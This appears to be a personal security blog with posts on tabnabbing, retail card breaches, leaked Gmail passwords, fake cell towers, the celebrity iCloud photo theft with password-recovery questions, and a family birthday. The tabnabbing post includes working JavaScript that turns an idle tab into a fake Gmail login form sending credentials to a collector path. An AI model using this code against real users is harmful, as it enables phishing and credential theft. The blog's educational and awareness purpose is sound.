Tabnabbing Attacks

The dangers of having too many tabs open.

How The Attack Works

  1. A user navigates to your normal looking site.
  2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
  3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-alike. This can all be done with just a little bit of JavaScript and takes place instantly.
  4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
  5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

Aza Raskin’s Tabnabbing is a proof-of-concept for a fiendish attack: a tab that waits until you’re not watching, then turns itself into a convincing Google login screen that you assume you must have opened.

Actually, it’s even sneakier: it can use CSS :visited history sniffing (since blocked by browsers) to figure out which websites you log in to, pick the matching decoy, and, in Raskin’s description, use a cross-site scripting attack to reload a different tab you’re not looking at into a convincing login screen.

To see it in action, check out Aza Raskin’s site, then navigate away in another tab for a little.
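To make steps 2 and 3 above concrete, here is an added example of the timing and page-swap logic such a page runs. It is not Aza Raskin’s demo code; the 10-second idle threshold, the decoy favicon URL and the `/harvest` form action are made-up values. The decision logic is kept free of DOM calls so it can be reasoned about outside a browser; `install()` wires it to a real `window` when one exists.

```javascript
// Added example, not code from Raskin's demo or from the original post.
// Mirrors the post's steps: (2) notice the tab has lost focus and gone idle,
// (3) swap favicon, title and body for a look-alike login form.
const IDLE_MS = 10000; // assumption: swap after 10 s out of focus with no input

// Tab state as a plain object; no DOM, so it is testable.
function initialState() {
  return { lostFocusAt: null, lastInputAt: 0, swapped: false };
}
function onBlur(state, now) { return { ...state, lostFocusAt: now }; }
function onFocus(state) { return { ...state, lostFocusAt: null }; }
function onInput(state, now) { return { ...state, lastInputAt: now }; }

// Step 2: fire only once, and only while the tab is unfocused and idle.
function shouldNab(state, now) {
  if (state.swapped || state.lostFocusAt === null) return false;
  const idleSince = Math.max(state.lostFocusAt, state.lastInputAt);
  return now - idleSince >= IDLE_MS;
}

// Step 3: what the page morphs into. Constructed decoy for "Gmail".
function buildDecoy() {
  return {
    title: 'Gmail: Email from Google',
    favicon: 'https://mail.google.com/favicon.ico', // assumption: icon URL of the impersonated site
    formHtml:
      '<form id="fake-login" action="/harvest" method="post">' + // assumption: attacker's collector
      '<input name="Email" placeholder="Email">' +
      '<input name="Passwd" type="password" placeholder="Password">' +
      '<button type="submit">Sign in</button></form>',
  };
}

// Applies the decoy to a live document: title, <link rel="icon">, body.
function applyDecoy(doc, decoy) {
  doc.title = decoy.title;
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement('link');
    link.rel = 'icon';
    doc.head.appendChild(link);
  }
  link.href = decoy.favicon;
  doc.body.innerHTML = decoy.formHtml;
}

// Browser wiring. Step 5 (redirect to the real site after the POST) would be
// the /harvest handler's response, not something the page itself needs.
function install(win = typeof window !== 'undefined' ? window : null) {
  if (!win) return null; // not in a browser (e.g. under Node): nothing to hook
  let state = initialState();
  win.addEventListener('blur', () => { state = onBlur(state, Date.now()); });
  win.addEventListener('focus', () => { state = onFocus(state); });
  ['mousemove', 'keydown', 'scroll'].forEach((ev) =>
    win.addEventListener(ev, () => { state = onInput(state, Date.now()); }));
  return win.setInterval(() => {
    if (shouldNab(state, Date.now())) {
      applyDecoy(win.document, buildDecoy());
      state = { ...state, swapped: true };
    }
  }, 500);
}
```

Two things this trick cannot fake are worth remembering: the address bar still shows the attacker’s origin, and a password manager that autofills by origin will refuse to fill the decoy form, which is a useful tell when a “Gmail” tab suddenly wants typing.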

Posted in Security Blog | Comments Off on Tabnabbing Attacks

Goodwill/C&K Systems

Since I posted about 868,000 Payment Cards, 330 Stores, it has been revealed that the exposure was due to C&K Systems.

All 20 previously affected Goodwill members have stopped using C&K Systems to process customers’ payment cards… Earlier this month, Goodwill said the breach stemmed from malware known as RAW.PoS, which was used to compromise a third-party vendor. Information exposed in the breach includes names, payment card numbers and expiration dates.

While details on the attack on C&K Systems are scarce, two security experts say it’s possible the compromise was the result of a remote-access attack.

There is an ever-present possibility that criminals are favoring remote access-type attacks because the log-in credentials needed to access the databases and/or hardware are elements that could easily be obtained through phishing or social engineering, something that is easy to remedy with security awareness training.


Gmail Passwords Posted

4,929,090 Gmail addresses and passwords were posted online. The credentials came from phishing and from compromised databases of other, weaker websites where people had reused their Gmail password, not from a breach of Google itself. The site isleaked can be used to check whether your email address is on the list. Whether or not your address is on the list, you should change your password regularly and never reuse it on other sites.


Home Depot Breach


Home improvement retailer Home Depot confirms that its payment systems were compromised in a massive cyber attack, possibly going back to April, affecting nearly 2,200 stores in the U.S. and Canada.

FishNet Security, Symantec, and the Secret Service are investigating who was behind the breach and what, and who, was affected.

According to a person close to the investigation, more than 60 million credit card numbers may have been stolen from Home Depot’s payment system. Comparatively, hackers stole data for over 40 million cards from Target’s system following a three-week attack during the busy Black Friday shopping season.

Home Depot has assured customers they won’t be responsible for any fraudulent charges on their credit or debit cards and has promised to offer free identity-protection services, including credit monitoring. So far, banks have not yet alerted customers to potential fraud.

Home Depot’s cybersecurity system is ranked behind that of other retailers. According to this report, Home Depot takes 1.3 days to clear malware from its system, lagging behind the retail industry average of one day. Online discussions of vulnerabilities on Home Depot’s website date back to 2008. These revelations raise serious concerns about Home Depot’s responsiveness to potential attacks, particularly in light of other retailers that have recently been targeted by hackers.

Two senators asked the federal government to investigate a data breach on the payment-card processing systems of Home Depot Inc.


Cyber Risk & Internet of Things

I made this video for work, but modified it a bit so it’s not directly work related. I didn’t edit the audio… Don’t hate! It’s my first one.

The intended audience is those who don’t think with a risk mindset. Hopefully it raises awareness that the simple things in life that seem very cool can be scary, and even dangerous, if precautions are not taken.


Fake Cell Phone Towers & CryptoPhone

Seventeen suspected fake cellphone towers (interceptors) were reported across the U.S. last week. They were found using the CryptoPhone from ESD America, an Android-based secure handset for encrypted messaging and voice over IP that also monitors the baseband and alerts when the network forces the phone down to 2G or turns off over-the-air encryption, the conditions an interceptor typically creates.

“What we find suspicious is that a lot of these interceptors are right on top of U.S. military bases. So we begin to wonder – are some of them U.S. government interceptors? Or are some of them Chinese interceptors?” says Goldsmith. “Whose interceptor is it? Who are they, that’s listening to calls around military bases? Is it just the U.S. military, or are they foreign governments doing it? The point is: we don’t really know whose they are.” -Les Goldsmith

What does that mean for the average person? It means that if you carry your phone with you, your calls and data can be intercepted by a base station you have no way of vetting, whether you like it or not. To what extent? It is hard to tell. Why? We have no idea why. What’s at risk? Everything your phone knows about you. Most handsets give no indication that they have been pushed onto an unencrypted 2G connection, which is exactly what the CryptoPhone’s alerts are for.

Read more here at Popular Science


868,000 Payment Cards, 330 Stores

Goodwill’s investigation revealed that malware had been installed on a third-party vendor system used by 10% of its franchised stores to process credit cards. Twenty of Goodwill’s 158 regional headquarters in the United States were impacted by the breach, because of the shared third-party system.

This link has the locations of Goodwill stores affected.


Nude Celebs (The Fappening) !!! and Password Recovery

Nude Jennifer Lawrence… Sorta.

Apple says that the mass theft of nude celebrity photos (dubbed “the Fappening”) released over the weekend did not result from a breach of any Apple systems, including iCloud. Apple also says that Find My iPhone was not involved in the photo thefts.

Based on an analysis of the metadata from leaked photos of Kate Upton, the photos appear to have come from a downloaded iCloud backup, which would be consistent with the use of iBrute (a tool that guesses iCloud passwords from a wordlist) followed by Elcomsoft Phone Password Breaker (EPPB), which can pull down an entire device backup once it has the account credentials.

Another way many accounts are compromised is through password-recovery pages that prompt for “out of wallet” (knowledge-based) questions.
Here are some examples of out of wallet questions:

  • What is your favorite sport?
  • What is your favorite vacation spot?
  • What was the make of the first car you owned?
  • What is your favorite hobby?
  • What do you like to do to relax?
  • What is your primary frequent flyer number?
  • What is your library card number?
  • What was your first phone number?
  • What was your first teacher’s name?
  • What is your father’s middle name?
  • What is the name of your favorite celebrity?
  • What is your favorite food?
  • What is the name of your favorite city?
  • What is your favorite animal?
  • What is your mother’s maiden name?
  • What is your favorite 5-digit number?
  • What are the last 5 digits of your favorite credit card?
  • What are the last 5 digits of your driver’s license number?
  • What are the last 5 digits of your vehicle identification number?
  • What are the last 5 digits of your employee ID number?
  • What are the last 5 digits of your Social Security number?
  • What City were you born in?
  • What is your shoe size?
  • How many bedrooms does your house have?
  • Where does your nearest sibling live?
  • What’s your drink of choice?
  • What color are the towels in your personal bathroom?
  • What is your ideal weight, in your view?
  • What is the last name of the author of the best book you ever read?
  • What is your favorite musical performer?
  • What is your brother’s/sister’s middle name?
  • What is your favorite game?
  • What was your nickname in high school/college?
  • How many miles do you live from work?
  • What is your favorite song?
  • What are the first five letters of your favorite song title? (Could also be a movie.)
  • What is your cell phone number? (No directories for this and you get another contact means. With number portability this should improve.)
  • What is your favorite feature about yourself? (A little invasive perhaps, but people like talking about themselves. The answer would need to be concise.)
  • How many siblings do you have?
  • What is your favorite word?
  • What is your Grandmother’s maiden name?
  • What was the town/City of grandfather’s birth?
  • What is the name of your favorite non-chain restaurant?
  • What is the pet name you gave your first car?
  • What is your favorite color?

The big thing to remember when setting up your answers is that there is no fact-checking attached to them, so you can give an untrue answer to every one of these questions. Would-be attackers will research all of your publicly available information to find the real answers and use them to get your password reset and take over your account. Treat the answers as a second set of passwords: make them random, and keep them in a password manager rather than your memory.


Should We Buy Credit Monitoring Services?

With the ton of breaches that have been happening, we use one of the credit monitoring services. After this year, though, and all the breaches going on, one of the first services offered to potential victims is credit monitoring.

In the recent news since my last posting, the following have been compromised


Damien is 18!!!1!

Damien the Surfer

I can’t believe I had this guy 18 years ago! Happy birthday Damien!

We celebrated his birthday yesterday, on Labor Day, at his favorite restaurant, then came home for some ice-cream cake. Since Damien is a licensed driver and a full-time student, for his birthday present we put him on our insurance and explained insurance, registration, title, etc. to him.
